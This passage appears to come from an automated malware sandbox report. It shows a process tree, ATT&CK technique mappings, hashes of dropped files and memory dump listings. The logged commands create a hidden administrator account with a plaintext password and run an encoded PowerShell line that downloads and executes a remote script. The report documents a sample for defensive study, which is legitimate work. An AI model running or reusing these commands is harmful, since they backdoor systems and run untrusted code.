- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3104

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc bbBpaooa
1⤵
- Suspicious use of WriteProcessMemory
PID:776
- C:\Windows\system32\net.exe
  net.exe user wgautilacc bbBpaooa
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc bbBpaooa
    3⤵
    PID:3684

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:3344
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:1572

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3664
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:3212

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:516
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:3660

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC6A1.tmp

MD5
291ce50da4ce041c974d272777bdef2c

SHA1
43b8a2668fad5c3af341765902d958377aafd9b4

SHA256
2f6e5490788d4212665b0edf4b146f5bd9f12de15155299e9e98df4f67b098fd

SHA512
c820783b43f9ebf683c22413337b6d30b20fe84010af4fea915043362a68fb0ff088ee9d228cd022eaf6a79aebd725c3d266864ace7db9e223ad2c3edcf1de34

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5
f784c76a5f451d89ecd31dc71a8c26cb

SHA1
81b9f4163f834ea3cf133e2be9b8b81279e41c6b

SHA256
8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f

SHA512
5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.dll

MD5
78060fc38dbf6be82d58073d875733dc

SHA1
d6d3a1a46b2d4f98fea9b5d38ce182c832d85714

SHA256
e0d3aa5228409c0390cba8aa47b0447285862b36970919ecb513f86f961e2dc8

SHA512
d80f4e7a5b81f1a18eb50b2f30fbd5bd0ee64b689dad79973c7defea7093616114f4cf5905bdcc986294f3f050976fc52ac6aa052b7c47afbe5ae586e32b9888

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\CSC5785D5D8B7D445B2AC25F685596F5E5.TMP

MD5
5c6802aa51c67d981edbfe4a22ba642d

SHA1
2710badb1a8e98c55c0ec7b7c70bf5ab24ef4d48

SHA256
802c81d977ce505523be74e70e110a78c2e3e982ef10de9b408c4ca94392cf2a

SHA512
30e73ab309077a71d02914870f2caf18c471cb4e37c6e38ff3b3f36efff7f3b446aad7fb4f9e42f7f77f44fd7044b4583a83fce49274bd7a055b5aad3d93acee

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.0.cs

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.cmdline

MD5
f5f663312b06688928fa5c1065c74068

SHA1
806bda7c6a1ee7afd9be32bdac946218090a393c

SHA256
2b5706f1f3e1d765a06538a6fb8bd528f2c73830372a29150169ab811b693426

SHA512
74b6f308b4e38555d99f52005f544c3c3091bff059d094c6580bc74118a0141d2a97bed32c18490f29ee7978c997c41dca9776d0dc81e7b9b7b81b7aa5bc7423

Download Submit
\Windows\Branding\mediasrv.png

MD5
02de1d05ec7c49607d0469e7731760c6

SHA1
39f0cddc616ab7ccfd0030f9aa257d6603373fb6

SHA256
dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb

SHA512
a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

Download Submit
\Windows\Branding\mediasvc.png

MD5
a82cc23d45b8e1de9897fa40dbfebecb

SHA1
16590d3f0a035e0c01a9959593dd35b5d417a18e

SHA256
300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821

SHA512
b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

Download Submit
memory/364-355-0x0000000000000000-mapping.dmp

Download
memory/516-338-0x0000000000000000-mapping.dmp

Download
memory/528-346-0x0000000000000000-mapping.dmp

Download
memory/584-344-0x0000000000000000-mapping.dmp

Download
memory/592-359-0x0000000000000000-mapping.dmp

Download
memory/808-301-0x0000000000000000-mapping.dmp

Download
memory/1008-299-0x0000000000000000-mapping.dmp

Download
memory/1140-342-0x0000000000000000-mapping.dmp

Download
memory/1236-347-0x0000000000000000-mapping.dmp

Download
memory/1260-352-0x0000000000000000-mapping.dmp

Download
memory/1268-141-0x0000000000000000-mapping.dmp

Download
memory/1496-357-0x0000000000000000-mapping.dmp

Download
memory/1572-364-0x0000000000000000-mapping.dmp

Download
memory/1580-349-0x0000000000000000-mapping.dmp

Download
memory/1608-354-0x0000000000000000-mapping.dmp

Download
memory/1624-348-0x0000000000000000-mapping.dmp

Download
memory/1756-447-0x0000000000000000-mapping.dmp

Download
memory/1860-118-0x000001B0EF133000-0x000001B0EF135000-memory.dmp

Filesize
8KB

Download
memory/1860-115-0x000001B0F1690000-0x000001B0F1A8F000-memory.dmp

Filesize
4.0MB

Download
memory/1860-120-0x000001B0EF136000-0x000001B0EF137000-memory.dmp

Filesize
4KB

Download
memory/1860-119-0x000001B0EF135000-0x000001B0EF136000-memory.dmp

Filesize
4KB

Download
memory/1860-117-0x000001B0EF130000-0x000001B0EF132000-memory.dmp

Filesize
8KB

Download
memory/2196-366-0x0000000000000000-mapping.dmp

Download
memory/2196-161-0x0000000000000000-mapping.dmp

Download
memory/2196-170-0x000001C0CAA70000-0x000001C0CAA72000-memory.dmp

Filesize
8KB

Download
memory/2196-201-0x000001C0CAA78000-0x000001C0CAA7A000-memory.dmp

Filesize
8KB

Download
memory/2196-190-0x000001C0CAA76000-0x000001C0CAA78000-memory.dmp

Filesize
8KB

Download
memory/2196-171-0x000001C0CAA73000-0x000001C0CAA75000-memory.dmp

Filesize
8KB

Download
memory/2796-126-0x0000018F46E90000-0x0000018F46E91000-memory.dmp

Filesize
4KB

Download
memory/2796-121-0x0000000000000000-mapping.dmp

Download
memory/2796-157-0x0000018F2EC28000-0x0000018F2EC29000-memory.dmp

Filesize
4KB

Download
memory/2796-137-0x0000018F2EC26000-0x0000018F2EC28000-memory.dmp

Filesize
8KB

Download
memory/2796-153-0x0000018F47C60000-0x0000018F47C61000-memory.dmp

Filesize
4KB

Download
memory/2796-152-0x0000018F478D0000-0x0000018F478D1000-memory.dmp

Filesize
4KB

Download
memory/2796-129-0x0000018F47120000-0x0000018F47121000-memory.dmp

Filesize
4KB

Download
memory/2796-130-0x0000018F2EC20000-0x0000018F2EC22000-memory.dmp

Filesize
8KB

Download
memory/2796-145-0x0000018F46EF0000-0x0000018F46EF1000-memory.dmp

Filesize
4KB

Download
memory/2796-131-0x0000018F2EC23000-0x0000018F2EC25000-memory.dmp

Filesize
8KB

Download
memory/2912-358-0x0000000000000000-mapping.dmp

Download
memory/2916-288-0x000001AAD0CA6000-0x000001AAD0CA8000-memory.dmp

Filesize
8KB

Download
memory/2916-242-0x0000000000000000-mapping.dmp

Download
memory/2916-289-0x000001AAD0CA8000-0x000001AAD0CAA000-memory.dmp

Filesize
8KB

Download
memory/2916-257-0x000001AAD0CA3000-0x000001AAD0CA5000-memory.dmp

Filesize
8KB

Download
memory/2916-256-0x000001AAD0CA0000-0x000001AAD0CA2000-memory.dmp

Filesize
8KB

Download
memory/2920-345-0x0000000000000000-mapping.dmp

Download
memory/3020-339-0x0000000000000000-mapping.dmp

Download
memory/3020-360-0x0000000000000000-mapping.dmp

Download
memory/3104-361-0x0000000000000000-mapping.dmp

Download
memory/3212-446-0x0000000000000000-mapping.dmp

Download
memory/3212-365-0x0000000000000000-mapping.dmp

Download
memory/3428-353-0x0000000000000000-mapping.dmp

Download
memory/3428-362-0x0000000000000000-mapping.dmp

Download
memory/3428-138-0x0000000000000000-mapping.dmp

Download
memory/3660-382-0x0000023223B16000-0x0000023223B18000-memory.dmp

Filesize
8KB

Download
memory/3660-367-0x0000000000000000-mapping.dmp

Download
memory/3660-428-0x0000023223B18000-0x0000023223B19000-memory.dmp

Filesize
4KB

Download
memory/3660-373-0x0000023223B10000-0x0000023223B12000-memory.dmp

Filesize
8KB

Download
memory/3660-300-0x0000000000000000-mapping.dmp

Download
memory/3660-375-0x0000023223B13000-0x0000023223B15000-memory.dmp

Filesize
8KB

Download
memory/3676-236-0x000002CA79783000-0x000002CA79785000-memory.dmp

Filesize
8KB

Download
memory/3676-235-0x000002CA79780000-0x000002CA79782000-memory.dmp

Filesize
8KB

Download
memory/3676-343-0x0000000000000000-mapping.dmp

Download
memory/3676-255-0x000002CA79788000-0x000002CA7978A000-memory.dmp

Filesize
8KB

Download
memory/3676-237-0x000002CA79786000-0x000002CA79788000-memory.dmp

Filesize
8KB

Download
memory/3676-200-0x0000000000000000-mapping.dmp

Download
memory/3684-363-0x0000000000000000-mapping.dmp

Download
memory/3920-356-0x0000000000000000-mapping.dmp

Download